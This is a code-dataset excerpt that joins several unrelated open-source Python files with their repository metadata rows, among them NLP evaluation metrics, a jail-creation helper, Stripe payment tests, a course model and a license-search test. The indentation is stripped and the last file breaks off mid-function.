sample_num = labels.shape[0]
for i in range(sample_num):
pred = preds[i]
label = labels[i]
if pred == 1:
if pred == label:
self.tp += 1
else:
self.fp += 1
else:
if pred == label:
self.tn += 1
else:
self.fn += 1
def accumulate(self):
"""
Calculates and returns the accumulated metric.
Returns:
tuple: Returns the accumulated metric, a tuple of shape (mcc,), `mcc` is the accumulated mcc and its data
type is float64.
"""
if self.tp == 0 or self.fp == 0 or self.tn == 0 or self.fn == 0:
mcc = 0.0
else:
# mcc = (tp*tn-fp*fn)/ sqrt(tp+fp)(tp+fn)(tn+fp)(tn+fn))
mcc = (self.tp * self.tn - self.fp * self.fn) / math.sqrt(
(self.tp + self.fp) * (self.tp + self.fn) *
(self.tn + self.fp) * (self.tn + self.fn))
return (mcc, )
def reset(self):
"""
Resets all metric states.
"""
self.tp = 0 # true positive
self.fp = 0 # false positive
self.tn = 0 # true negative
self.fn = 0 # false negative
def name(self):
"""
Returns name of the metric instance.
Returns:
str: The name of the metric instance.
"""
return self._name
class PearsonAndSpearman(Metric):
"""
The class calculates `Pearson correlation coefficient <https://en.wikipedia.org/wiki/Pearson_correlation_coefficient>`_
and `Spearman's rank correlation coefficient <https://en.wikipedia.org/wiki/Spearman%27s_rank_correlation_coefficient>`_ .
Args:
name (str, optional):
String name of the metric instance. Defaults to 'pearson_and_spearman'.
Example:
.. code-block::
import paddle
from paddlenlp.metrics import PearsonAndSpearman
x = paddle.to_tensor([[0.1], [1.0], [2.4], [0.9]])
y = paddle.to_tensor([[0.0], [1.0], [2.9], [1.0]])
m = PearsonAndSpearman()
m.update((x, y))
res = m.accumulate()
print(res) # (0.9985229081857804, 1.0, 0.9992614540928901)
"""
def __init__(self, name='pearson_and_spearman', *args, **kwargs):
super(PearsonAndSpearman, self).__init__(*args, **kwargs)
self._name = name
self.preds = []
self.labels = []
def update(self, preds_and_labels):
"""
Ensures the type of preds and labels is numpy.ndarray and reshapes them
into [-1, 1].
Args:
preds_and_labels (tuple[Tensor] or list[Tensor]):
Tuple or list of predicted value and the ground truth label.
Its data type should be float32 or float64 and its shape is [batch_size, d0, ..., dN].
"""
preds = preds_and_labels[0]
labels = preds_and_labels[1]
if isinstance(preds, paddle.Tensor):
preds = preds.numpy()
if isinstance(labels, paddle.Tensor):
labels = labels.numpy()
preds = np.squeeze(preds.reshape(-1, 1)).tolist()
labels = np.squeeze(labels.reshape(-1, 1)).tolist()
self.preds.append(preds)
self.labels.append(labels)
def accumulate(self):
"""
Calculates and returns the accumulated metric.
Returns:
tuple: Returns the accumulated metric, a tuple of (pearson, spearman,
the_average_of_pearson_and_spearman).
With the fields:
- `pearson` (numpy.float64):
The accumulated pearson.
- `spearman` (numpy.float64):
The accumulated spearman.
- `the_average_of_pearson_and_spearman` (numpy.float64):
The average of accumulated pearson and spearman correlation
coefficient.
"""
preds = [item for sublist in self.preds for item in sublist]
labels = [item for sublist in self.labels for item in sublist]
pearson = self.pearson(preds, labels)
spearman = self.spearman(preds, labels)
return (
pearson,
spearman,
(pearson + spearman) / 2,
)
def pearson(self, preds, labels):
n = len(preds)
# simple sums
sum1 = sum(float(preds[i]) for i in range(n))
sum2 = sum(float(labels[i]) for i in range(n))
# sum up the squares
sum1_pow = sum([pow(v, 2.0) for v in preds])
sum2_pow = sum([pow(v, 2.0) for v in labels])
# sum up the products
p_sum = sum([preds[i] * labels[i] for i in range(n)])
numerator = p_sum - (sum1 * sum2 / n)
denominator = math.sqrt(
(sum1_pow - pow(sum1, 2) / n) * (sum2_pow - pow(sum2, 2) / n))
if denominator == 0:
return 0.0
return numerator / denominator
def spearman(self, preds, labels):
preds_rank = self.get_rank(preds)
labels_rank = self.get_rank(labels)
total = 0
n = len(preds)
for i in range(n):
total += pow((preds_rank[i] - labels_rank[i]), 2)
spearman = 1 - float(6 * total) / (n * (pow(n, 2) - 1))
return spearman
def get_rank(self, raw_list):
x = np.array(raw_list)
r_x = np.empty(x.shape, dtype=int)
y = np.argsort(-x)
for i, k in enumerate(y):
r_x[k] = i + 1
return r_x
def reset(self):
"""
Resets all metric states.
"""
self.preds = []
self.labels = []
def name(self):
"""
Returns name of the metric instance.
Returns:
str: The name of the metric instance.
"""
return self._name
class MultiLabelsMetric(Metric):
"""
This class encapsulates Accuracy, Precision, Recall and F1 metric logic in
multi-labels setting (also the binary setting).
Some codes are taken and modified from sklearn.metrics .
Args:
num_labels (int)
The total number of labels which is usually the number of classes
name (str, optional):
String name of the metric instance. Defaults to 'multi_labels_metric'.
Example:
.. code-block::
import paddle
from paddlenlp.metrics import MultiLabelsMetric
x = paddle.to_tensor([[0.1, 0.2, 0.9], [0.5, 0.8, 0.5], [0.6, 1.5, 0.4], [2.8, 0.7, 0.3]])
y = paddle.to_tensor([[2], [1], [2], [1]])
m = MultiLabelsMetric(num_labels=3)
args = m.compute(x, y)
m.update(args)
result1 = m.accumulate(average=None)
# (array([0.0, 0.5, 1.0]), array([0.0, 0.5, 0.5]), array([0.0, 0.5, 0.66666667]))
result2 = m.accumulate(average='binary', pos_label=0)
# (0.0, 0.0, 0.0)
result3 = m.accumulate(average='binary', pos_label=1)
# (0.5, 0.5, 0.5)
result4 = m.accumulate(average='binary', pos_label=2)
# (1.0, 0.5, 0.6666666666666666)
result5 = m.accumulate(average='micro')
# (0.5, 0.5, 0.5)
result6 = m.accumulate(average='macro')
# (0.5, 0.3333333333333333, 0.38888888888888884)
result7 = m.accumulate(average='weighted')
# (0.75, 0.5, 0.5833333333333333)
Note: When zero_division is encountered (details as followed), the corresponding metrics will be set to 0.0
precision is zero_division if there are no positive predictions
recall is zero_division if there are no positive labels
fscore is zero_division if all labels AND predictions are negative
"""
def __init__(self, num_labels, name='multi_labels_metric'):
super(MultiLabelsMetric, self).__init__()
if num_labels <= 1:
raise ValueError(
f"The num_labels is {num_labels}, which must be greater than 1."
)
self.num_labels = num_labels
self._name = name
self._confusion_matrix = np.zeros((num_labels, 2, 2), dtype=int)
def update(self, args):
"""
Updates the metrics states (accuracy, precision and recall), in order to
calculate accumulated accuracy, precision and recall of all instances.
Args:
args (tuple of Tensor):
the tuple returned from `compute` function
"""
pred = args[0].numpy()
label = args[1].numpy()
tmp_confusion_matrix = self._multi_labels_confusion_matrix(pred, label)
self._confusion_matrix += tmp_confusion_matrix
def accumulate(self, average=None, pos_label=1):
"""
Calculates and returns the accumulated metric.
Args:
average (str in {‘binary’, ‘micro’, ‘macro’, ’weighted’} or None, optional):
Defaults to `None`. If `None`, the scores for each class are returned.
Otherwise, this determines the type of averaging performed on the data:
- `binary` :
Only report results for the class specified by pos_label.
- `micro` :
Calculate metrics globally by counting the total true positives,
false negatives and false positives.
- `macro` :
Calculate metrics for each label, and find their unweighted mean.
This does not take label imbalance into account.
- `weighted` :
Calculate metrics for each label, and find their average weighted
by support (the number of true instances for each label). This
alters `macro` to account for label imbalance; it can result in
an F-score that is not between precision and recall.
pos_label (int, optional):
The positive label for calculating precision and recall in binary settings.
Noted: Only when `average='binary'`, this arguments will be used. Otherwise,
it will be ignored.
Defaults to 1.
Returns:
tuple: The accumulated metric. A tuple of shape (precision, recall, f1)
With the fields:
- `precision` (numpy.float64 or numpy.ndarray if average=None):
The accumulated precision.
- `recall` (numpy.float64 or numpy.ndarray if average=None):
The accumulated recall.
- `f1` (numpy.float64 or numpy.ndarray if average=None):
The accumulated f1.
"""
if average not in {'binary', 'micro', 'macro', 'weighted', None}:
raise ValueError(f"The average is {average}, which is unknown.")
if average == 'binary':
if pos_label >= self.num_labels:
raise ValueError(
f"The pos_label is {pos_label}, num_labels is {self.num_labels}. "
f"The num_labels must be greater than pos_label.")
confusion_matrix = None # [*, 2, 2]
if average == 'binary':
confusion_matrix = np.expand_dims(self._confusion_matrix[pos_label],
axis=0)
elif average == 'micro':
confusion_matrix = self._confusion_matrix.sum(axis=0, keepdims=True)
# if average is 'macro' or 'weighted' or None
else:
confusion_matrix = self._confusion_matrix
tp = confusion_matrix[:, 1, 1] # [*,]
pred = tp + confusion_matrix[:, 0, 1] # [*,]
true = tp + confusion_matrix[:, 1, 0] # [*,]
def _robust_divide(numerator, denominator, metric_name):
mask = denominator == 0.0
denominator = denominator.copy()
denominator[mask] = 1 # avoid zero division
result = numerator / denominator
if not np.any(mask):
return result
# precision is zero_division if there are no positive predictions
# recall is zero_division if there are no positive labels
# fscore is zero_division if all labels AND predictions are negative
warnings.warn(f'Zero division when calculating {metric_name}.',
UserWarning)
result[mask] = 0.0
return result
precision = _robust_divide(tp, pred, 'precision')
recall = _robust_divide(tp, true, 'recall')
f1 = _robust_divide(2 * (precision * recall), (precision + recall),
'f1')
weights = None # [num_labels]
if average == 'weighted':
weights = true
if weights.sum() == 0:
zero_division_value = np.float64(0.0)
if pred.sum() == 0:
return (zero_division_value, zero_division_value,
zero_division_value)
else:
return (np.float64(0.0), zero_division_value,
np.float64(0.0))
elif average == 'macro':
weights = np.ones((self.num_labels), dtype=float)
if average is not None:
precision = np.average(precision, weights=weights)
recall = np.average(recall, weights=weights)
f1 = np.average(f1, weights=weights)
return precision, recall, f1
def compute(self, pred, label):
"""
Accepts network's output and the labels, and calculates the top-k
(maximum value in topk) indices for accuracy.
Args:
pred (Tensor):
Predicted tensor, and its dtype is float32 or float64, and
has a shape of [batch_size, *, num_labels].
label (Tensor):
The ground truth tensor, and its dtype is is int64, and has a
shape of [batch_size, *] or [batch_size, *, num_labels] in one
hot representation.
Returns:
tuple of Tensor: it contains two Tensor of shape [*, 1].
The tuple should be passed to `update` function.
"""
if not (paddle.is_tensor(pred) and paddle.is_tensor(label)):
raise ValueError('pred and label must be paddle tensor')
if pred.shape[-1] != self.num_labels:
raise ValueError(f'The last dim of pred is {pred.shape[-1]}, '
f'which should be num_labels')
pred = paddle.reshape(pred, [-1, self.num_labels])
pred = paddle.argmax(pred, axis=-1)
if label.shape[-1] == self.num_labels:
label = paddle.reshape(label, [-1, self.num_labels])
label = paddle.argmax(label, axis=-1)
else:
label = paddle.reshape(label, [-1])
if paddle.max(label) >= self.num_labels:
raise ValueError(f"Tensor label has value {paddle.max(label)}, "
f"which is no less than num_labels")
if pred.shape[0] != label.shape[0]:
raise ValueError(
f"The length of pred is not equal to the length of label")
return pred, label
def _multi_labels_confusion_matrix(self, pred, label):
tp_bins = label[pred == label]
tp = np.bincount(tp_bins, minlength=self.num_labels) # [num_labels,]
tp_plus_fp = np.bincount(pred,
minlength=self.num_labels) # [num_labels,]
tp_plus_fn = np.bincount(label,
minlength=self.num_labels) # [num_labels,]
fp = tp_plus_fp - tp # [num_labels,]
fn = tp_plus_fn - tp # [num_labels,]
tn = pred.shape[0] - tp - fp - fn # [num_labels,]
return np.array([tn, fp, fn, tp]).T.reshape(-1, 2,
2) # [num_labels, 2, 2]
def reset(self):
self._confusion_matrix = np.zeros((self.num_labels, 2, 2), dtype=int)
def name(self):
"""
Returns name of the metric instance.
Returns:
str: The name of the metric instance.
"""
return self._name
| 35.266667 | 128 | 0.557533 |
518acc85a3eafe90e437ee149571f3c558eaa570
| 640 |
py
|
Python
|
jocker/create.py
|
omab/jocker
|
44a79d4c12bb4df9c3333da75eb34964de64ad20
|
[
"BSD-2-Clause"
] | 3 |
2017-10-18T08:11:58.000Z
|
2019-07-31T23:53:37.000Z
|
jocker/create.py
|
omab/jocker
|
44a79d4c12bb4df9c3333da75eb34964de64ad20
|
[
"BSD-2-Clause"
] | null | null | null |
jocker/create.py
|
omab/jocker
|
44a79d4c12bb4df9c3333da75eb34964de64ad20
|
[
"BSD-2-Clause"
] | null | null | null |
"""
Create a jail from the given base
"""
from .parser import parse, Jockerfile
from .backends.utils import get_backend
def create_from_base(base, name=None, network=None):
"""
Build a Jail from the given base.
"""
jail_backend = get_backend(jailname=name)
jockerfile = jail_backend.base_jockerfile(base)
jail_backend.create(jockerfile, network=network)
def create_from_jockerfile(jockerfile, name=None, network=None):
"""
Build a Jail from the given base.
"""
jockerfile = Jockerfile(jockerfile)
jail_backend = get_backend(jailname=name)
jail_backend.create(jockerfile, network=network)
| 26.666667 | 64 | 0.726563 |
5c79d353daa1f8a4feb8ecfea670be116ee20ee4
| 1,666 |
py
|
Python
|
src/onegov/fsi/models/course.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/fsi/models/course.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/fsi/models/course.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from arrow import utcnow
from onegov.core.html import html_to_text
from onegov.core.orm import Base
from onegov.core.orm.types import UUID
from onegov.search import ORMSearchable
from sqlalchemy import Column, Text, Boolean, Integer
from sqlalchemy.ext.hybrid import hybrid_property
from uuid import uuid4
class Course(Base, ORMSearchable):
__tablename__ = 'fsi_courses'
es_properties = {
'name': {'type': 'localized'},
'description': {'type': 'localized'},
}
es_public = True
id = Column(UUID, primary_key=True, default=uuid4)
name = Column(Text, nullable=False, unique=True)
description = Column(Text, nullable=False)
# saved as integer (years), accessed as years
refresh_interval = Column(Integer)
# If the course has to be refreshed after some interval
mandatory_refresh = Column(Boolean, nullable=False, default=False)
# hides the course in the collection for non-admins
hidden_from_public = Column(Boolean, nullable=False, default=False)
@property
def title(self):
return self.name
@property
def lead(self):
text = html_to_text(self.description)
if len(text) > 160:
return text[:160] + '…'
else:
return text
@property
def description_html(self):
"""
Returns the description that is saved as HTML from the redactor js
plugin.
"""
return self.description
@hybrid_property
def future_events(self):
from onegov.fsi.models import CourseEvent
return self.events.filter(CourseEvent.start > utcnow()).order_by(
CourseEvent.start)
| 27.311475 | 74 | 0.672869 |
56b4c87928c8ebc3b548ac95e2fa6293330a2830
| 245 |
py
|
Python
|
server/api/__init__.py
|
gustavodsf/rdx_hack
|
3b504bf8181495fdd1c3a06f963970469f6655f1
|
[
"MIT"
] | null | null | null |
server/api/__init__.py
|
gustavodsf/rdx_hack
|
3b504bf8181495fdd1c3a06f963970469f6655f1
|
[
"MIT"
] | null | null | null |
server/api/__init__.py
|
gustavodsf/rdx_hack
|
3b504bf8181495fdd1c3a06f963970469f6655f1
|
[
"MIT"
] | 1 |
2017-12-02T15:27:53.000Z
|
2017-12-02T15:27:53.000Z
|
"""This py describe the class the could be accessed by other."""
__author__ = "Gustavo Figueiredo"
__copyright__ = "CASA"
__version__ = "1.0.1"
__maintainer__ = "Gustavo Figueiredo"
__email__ = "[email protected]"
__status__ = "Development"
| 30.625 | 64 | 0.755102 |
8531c3f882fd85200eb06cfa874e12b0eb85ad5e
| 152 |
py
|
Python
|
tintz/newsletter/urls.py
|
dcfranca/tintz-backend
|
9f29e17cafc31ab7dc568d1e2c984e6f1b1fc3fc
|
[
"MIT"
] | null | null | null |
tintz/newsletter/urls.py
|
dcfranca/tintz-backend
|
9f29e17cafc31ab7dc568d1e2c984e6f1b1fc3fc
|
[
"MIT"
] | 2 |
2021-03-19T21:51:51.000Z
|
2021-06-10T18:22:50.000Z
|
tintz/newsletter/urls.py
|
danielfranca/tintz-backend
|
9f29e17cafc31ab7dc568d1e2c984e6f1b1fc3fc
|
[
"MIT"
] | null | null | null |
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^subscribers/$', views.SubscriberApi.as_view(), name='subscribers'),
]
| 19 | 78 | 0.710526 |
a47bed0d65469e8cadf2cbd5286af7688bd5866a
| 4,089 |
py
|
Python
|
tests/onegov/pay/test_stripe.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/pay/test_stripe.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/pay/test_stripe.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
import logging
import pytest
import requests_mock
import transaction
from onegov.pay.models.payment_providers.stripe import (
StripeConnect,
StripeFeePolicy,
StripeCaptureManager
)
from purl import URL
from unittest import mock
from urllib.parse import quote
def test_oauth_url():
provider = StripeConnect(client_id='foo', client_secret='bar')
url = provider.oauth_url('https://handle-incoming-request')
assert 'response_type=code' in url
assert 'handle-incoming-request' in url
assert 'scope=read_write' in url
assert 'client_id=foo' in url
assert 'client_secret=bar' in url
url = provider.oauth_url('https://foo', 'bar', {'email': '[email protected]'})
assert 'state=bar' in url
assert 'stripe_user%5Bemail%5D=foo%40bar.org' in url
def test_process_oauth_response():
provider = StripeConnect(
client_id='foo',
client_secret='bar',
oauth_gateway='https://oauth.onegovcloud.ch/',
oauth_gateway_secret='foo',
)
with pytest.raises(RuntimeError) as e:
provider.process_oauth_response(
{
'error': 'foo',
'error_description': 'bar',
}
)
assert e.value.args == ('Stripe OAuth request failed (foo: bar)', )
with mock.patch('stripe.OAuth.token', return_value={
'scope': 'read_write',
'stripe_publishable_key': 'pubkey',
'stripe_user_id': 'uid',
'refresh_token': 'rtoken',
'access_token': 'atoken',
}):
provider.process_oauth_response({
'code': '0xdeadbeef',
'oauth_redirect_secret': 'foo'
})
assert provider.publishable_key == 'pubkey'
assert provider.user_id == 'uid'
assert provider.refresh_token == 'rtoken'
assert provider.access_token == 'atoken'
def test_stripe_fee_policy():
assert StripeFeePolicy.from_amount(100) == 3.2
assert StripeFeePolicy.compensate(100) == 103.3
assert StripeFeePolicy.compensate(33.33) == 34.63
def test_stripe_capture_good_charge():
class GoodCharge(object):
captured = False
def capture(self):
self.captured = True
charge = GoodCharge()
with mock.patch('stripe.Charge.retrieve', return_value=charge):
StripeCaptureManager.capture_charge('foo', 'bar')
assert not charge.captured
transaction.commit()
assert charge.captured
def test_stripe_capture_evil_charge(capturelog):
capturelog.setLevel(logging.ERROR, logger='onegov.pay')
class EvilCharge(object):
def capture(self):
assert False
charge = EvilCharge()
with mock.patch('stripe.Charge.retrieve', return_value=charge):
StripeCaptureManager.capture_charge('foo', 'bar')
transaction.commit()
assert capturelog.records()[0].message\
== 'Stripe charge with capture id bar failed'
def test_stripe_capture_negative_vote():
with mock.patch('stripe.Charge.retrieve', side_effect=AssertionError()):
StripeCaptureManager.capture_charge('foo', 'bar')
with pytest.raises(AssertionError):
transaction.commit()
def test_stripe_prepare_oauth_request():
stripe = StripeConnect()
stripe.oauth_gateway = 'https://oauth.example.org'
stripe.oauth_gateway_auth = 'gateway_auth'
stripe.oauth_gateway_secret = 'gateway_secret'
stripe.client_id = 'client_id'
stripe.client_secret = 'client_secret'
with requests_mock.Mocker() as m:
m.post('https://oauth.example.org/register/gateway_auth', json={
'token': '0xdeadbeef'
})
url = stripe.prepare_oauth_request(
redirect_uri='https://endpoint',
success_url='https://success',
error_url='https://error'
)
assert quote('https://oauth.example.org/redirect', safe='') in url
url = URL(url)
assert url.query_param('state') == '0xdeadbeef'
assert url.query_param('scope') == 'read_write'
assert url.query_param('client_id') == 'client_id'
| 29.207143 | 76 | 0.651993 |
f1825865e92fdab20152b97a1e9e014916db2c8f
| 2,354 |
py
|
Python
|
CCR/run.py
|
MateRyze/InformatiCup-2019
|
eeca3ff7f8a102f4093697c6badee21ce25e2e87
|
[
"MIT"
] | 3 |
2019-03-21T17:02:55.000Z
|
2019-04-04T18:16:10.000Z
|
CCR/run.py
|
MateRyze/InformatiCup-2019
|
eeca3ff7f8a102f4093697c6badee21ce25e2e87
|
[
"MIT"
] | 11 |
2019-10-30T12:05:39.000Z
|
2022-03-11T23:43:54.000Z
|
CCR/run.py
|
MateRyze/InformatiCup-2019
|
eeca3ff7f8a102f4093697c6badee21ce25e2e87
|
[
"MIT"
] | 1 |
2019-10-30T12:04:00.000Z
|
2019-10-30T12:04:00.000Z
|
import requests
import os
import skimage
import time
import csv
from PIL import Image
import pandas as pd
# dir with test images
rootdir = './Images'
# resize images to 64x64 and convert from PPM to PNG format
def convertImages():
for subdir, dirs, files in os.walk(rootdir):
for file in files:
path = os.path.join(subdir, file)
print(path)
data = skimage.io.imread(path)
data = skimage.transform.resize(data, (64, 64))
skimage.io.imsave(path.replace('.ppm', '.png'), data)
def getClasses():
names = set([])
list = []
i = 0
limit = 100
for subdir, dirs, files in os.walk(rootdir):
for file in files:
if (i < limit):
path = os.path.join(subdir, file)
if '.png' in path:
print(path)
image = Image.open(path)
payload= {'key': 'Engeibei1uok4xaecahChug6eihos0wo'}
r = requests.post('https://phinau.de/trasi', data=payload, files= {'image': open(path, 'rb')})
# get all classes from the API
for name in r.json():
names.add(name.get('class'))
print(names, len(names))
time.sleep(1)
i = i + 1
'''
try:
names.add(r.json()[0].get('class'))
d = {"filename": path, "class": r.json()[0].get('class'), "confidence": r.json()[0].get('confidence')}
print(names, len(names))
list.append(d)
print(i, len(names))
time.sleep(1)
i = i + 1
except:
with open('results.csv', 'w') as f:
w = csv.DictWriter(f, list[0].keys(), delimiter =';')
for item in list:
w.writerow(item)
'''
def mapResults():
with open('results.csv', 'r') as f:
df = pd.read_csv(f)
print(df)
with open('results_mapping.csv', 'r') as idFile:
idFileDF = pd.read_csv(idFile)
print(idFileDF)
for index, row in idFileDF.iterrows():
name = row[0]
df.loc[df['class'] == name, ['actual_id']] = row[1]
df.to_csv('results_mapped.csv')
# calculate the Correct Classification Rate (CCR) from a CSV file
def calculateCCR():
cumulatedResult = 0
with open('results_mapped.csv', 'r') as f:
df = pd.read_csv(f)
print(df)
for index, row in df.iterrows():
if(row[5] == row[6]):
#print(row[5], row[6])
cumulatedResult += 1
print "CCR: ", float(cumulatedResult)/len(df.index)
#convertImages()
#getClasses()
#mapResults()
# FOR RESULTS SEE: results_mapped.csv
calculateCCR()
| 26.155556 | 108 | 0.616822 |
7ac3ea0d02e770dd38e788a27e196357f2564a77
| 344 |
py
|
Python
|
dcapy/dca/__init__.py
|
scuervo91/dcapy
|
46c9277e607baff437e5707167476d5f7e2cf80c
|
[
"MIT"
] | 4 |
2021-05-21T13:26:10.000Z
|
2021-11-15T17:17:01.000Z
|
dcapy/dca/__init__.py
|
scuervo91/dcapy
|
46c9277e607baff437e5707167476d5f7e2cf80c
|
[
"MIT"
] | null | null | null |
dcapy/dca/__init__.py
|
scuervo91/dcapy
|
46c9277e607baff437e5707167476d5f7e2cf80c
|
[
"MIT"
] | null | null | null |
from .arps import arps_exp_rate,arps_exp_cumulative,arps_arm_cumulative,arps_hyp_cumulative,arps_cumulative, arps_hyp_rate, arps_rate_time, arps_forecast,Arps
from .dca import DCA, Forecast, ProbVar
from .timeconverter import converter_factor, list_freq,time_converter_matrix, FreqEnum
from .wor import bsw_to_wor, wor_to_bsw, wor_forecast, Wor
| 86 | 158 | 0.869186 |
7ad41c2d042dc89d23676dca3bc129fe7f96d538
| 2,203 |
py
|
Python
|
src/processing/Output.py
|
Phrosten/CodeCompetition_07-2017_BigData
|
3d9cb8da2164ea2687471375966d77ff7b129a93
|
[
"Apache-2.0"
] | null | null | null |
src/processing/Output.py
|
Phrosten/CodeCompetition_07-2017_BigData
|
3d9cb8da2164ea2687471375966d77ff7b129a93
|
[
"Apache-2.0"
] | null | null | null |
src/processing/Output.py
|
Phrosten/CodeCompetition_07-2017_BigData
|
3d9cb8da2164ea2687471375966d77ff7b129a93
|
[
"Apache-2.0"
] | null | null | null |
#
# JSON Output
#
def GenerateJSONArray(list, startIndex=0, endIndex=None, date=False): # Generate a json array string from a list
# ASSUMPTION: All items are of the same type / if one is list all are list
if(len(list) > 0 and type(list[0]) == type([])): # If the list has entries and the type of the list items is list as well
acc = "[" # Accumulate the data
for i in range(0, len(list)): # Recursively add the json strings of each list to the accumulator
acc += GenerateJSONArray(list[i])
if(not i == len(list) - 1):
acc += ","
return acc + "]" # Return the accumulator
else: # If the list contains non list items
acc = "["
if(endIndex == None):
endIndex = len(list) # Set a default endIndex if None is provided
for i in range(startIndex, endIndex): # Iterate the list
value = "" # Get value as string
number = False # False if item is not a number
try: # Try to parse the string to a number
value = int(list[i])
number = True
except ValueError:
try:
value = round(float(list[i]), 2)
number = True
except ValueError:
value = list[i]
if(not number or date): # If the item is not a number add "
acc += "\"" + list[i].replace("\"", "\\\"") + "\""
else: # Else add it just as string
acc += str(value).replace('.0', '') # Replace unnecessary 0s
if(not i == len(list) - 1):
acc += ","
return acc + "]"
def GenerateJSONArrayFromDict(dict, endIndex): # Generate json string from dictionary
# ASSUMPTION: Dict only has number keys
acc = "["
for i in range(0, endIndex): # Go through all possible keys starting from 0
if(not i in dict): # If the key is not in the dictionary
val = 0 # Its value is 0
else:
val = dict[i] # Else get value
acc += str(val) # Add value to accumulator
if(not i == endIndex - 1):
acc += ","
return acc + "]"
| 36.114754 | 130 | 0.532002 |
24c8d95c8cb878f0d1928158a43b83c03635fe7a
| 13,485 |
py
|
Python
|
python-bildungslogin/ucs-test/97_bildungslogin_python/10_test_search.py
|
univention/bildungslogin
|
29bebe858a5445dd5566aad594b33b9dd716eca4
|
[
"MIT"
] | null | null | null |
python-bildungslogin/ucs-test/97_bildungslogin_python/10_test_search.py
|
univention/bildungslogin
|
29bebe858a5445dd5566aad594b33b9dd716eca4
|
[
"MIT"
] | null | null | null |
python-bildungslogin/ucs-test/97_bildungslogin_python/10_test_search.py
|
univention/bildungslogin
|
29bebe858a5445dd5566aad594b33b9dd716eca4
|
[
"MIT"
] | null | null | null |
#!/usr/share/ucs-test/runner /usr/bin/py.test -slvv --cov --cov-config=.coveragerc --cov-append --cov-report=
# -*- coding: utf-8 -*-
#
# Copyright 2021 Univention GmbH
#
# https://www.univention.de/
#
# All rights reserved.
#
# The source code of this program is made available
# under the terms of the GNU Affero General Public License version 3
# (GNU AGPL V3) as published by the Free Software Foundation.
#
# Binary versions of this program provided by Univention to you as
# well as other copyrighted, protected or trademarked materials like
# Logos, graphics, fonts, specific documentations and configurations,
# cryptographic keys etc. are subject to a license agreement between
# you and Univention and not subject to the GNU AGPL V3.
#
# In the case you use this program under the terms of the GNU AGPL V3,
# the program is provided in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public
# License with the Debian GNU/Linux or Univention distribution in file
# /usr/share/common-licenses/AGPL-3; if not, see
# <https://www.gnu.org/licenses/>.
## desc: search for licenses
## exposure: dangerous
## tags: [bildungslogin]
## roles: [domaincontroller_master, domaincontroller_backup, domaincontroller_slave]
## packages: [python-bildungslogin, udm-bildungslogin-encoders]
from copy import deepcopy
from datetime import datetime, timedelta
from uuid import uuid4
import pytest
from ucsschool.lib.models.user import Student
from univention.bildungslogin.handlers import AssignmentHandler, LicenseHandler, MetaDataHandler, \
ObjectType
from univention.bildungslogin.models import LicenseType
from univention.udm import UDM
GOOD_SEARCH = "FOUND"
FUZZY_SEARCH = "*FUZZY*"
BAD_SEARCH = "NOT_FOUND"
@pytest.fixture(scope="module")
def test_user(lo_module, ou):
user = Student(
password="univention",
name="bildungslogin_username",
firstname="bildungslogin_firstname",
lastname="bildungslogin_lastname",
school=ou,
)
user.create(lo_module)
return user.name
@pytest.fixture(scope="module")
def single_license(
get_license,
get_meta_data,
lo_module,
ou,
test_user,
):
license_handler = LicenseHandler(lo_module)
meta_data_handler = MetaDataHandler(lo_module)
assignment_handler = AssignmentHandler(lo_module)
license = get_license(ou, license_type=LicenseType.SINGLE)
meta_data = get_meta_data()
meta_data.title = "univention_single"
meta_data.publisher = "univention_single"
license.license_code = "univention_single"
meta_data.product_id = "univention_single"
license.license_quantity = 1
license.product_id = meta_data.product_id
license_handler.create(license)
meta_data_handler.create(meta_data)
udm_license = license_handler.get_udm_license_by_code(license.license_code)
assignment_handler.assign_license(udm_license, ObjectType.USER, test_user)
return license
@pytest.fixture(scope="module")
def volume_license(
get_license,
get_meta_data,
lo_module,
ou,
test_user,
):
license_handler = LicenseHandler(lo_module)
meta_data_handler = MetaDataHandler(lo_module)
assignment_handler = AssignmentHandler(lo_module)
license = get_license(ou, license_type=LicenseType.VOLUME)
meta_data = get_meta_data()
meta_data.title = "univention_volume"
meta_data.publisher = "univention_volume"
license.license_code = "univention_volume"
meta_data.product_id = "univention_volume"
license.license_quantity = 2
license.product_id = meta_data.product_id
license_handler.create(license)
meta_data_handler.create(meta_data)
udm_license = license_handler.get_udm_license_by_code(license.license_code)
assignment_handler.assign_license(udm_license, ObjectType.USER, test_user)
return license
@pytest.fixture(scope="module")
def udm_license_mod(lo_module):
udm = UDM(lo_module).version(1)
return udm.get("bildungslogin/license")
@pytest.mark.parametrize(
"title",
[
GOOD_SEARCH,
FUZZY_SEARCH,
BAD_SEARCH,
],
)
@pytest.mark.parametrize(
"publisher",
[
GOOD_SEARCH,
FUZZY_SEARCH,
BAD_SEARCH,
],
)
@pytest.mark.parametrize(
"license_code",
[
GOOD_SEARCH,
FUZZY_SEARCH,
BAD_SEARCH,
],
)
@pytest.mark.parametrize(
"product_id",
[
GOOD_SEARCH,
FUZZY_SEARCH,
BAD_SEARCH,
],
)
def test_search_for_license_pattern(
ou,
license_handler,
license_obj,
meta_data_handler,
meta_data,
title,
publisher,
license_code,
product_id,
):
"""Test simple search with OR in title, publisher, license code (case sensitive)
and product id (case sensitive)"""
def __create_license(title=None, publisher=None, license_code=None, product_id=None):
new_license = deepcopy(license_obj(ou))
new_meta_data = deepcopy(meta_data)
if title:
new_meta_data.title = title.replace("*", "sun")
if publisher:
new_meta_data.publisher = publisher.replace("*", "sun")
if license_code:
new_license.license_code = license_code.replace("*", "sun")
else:
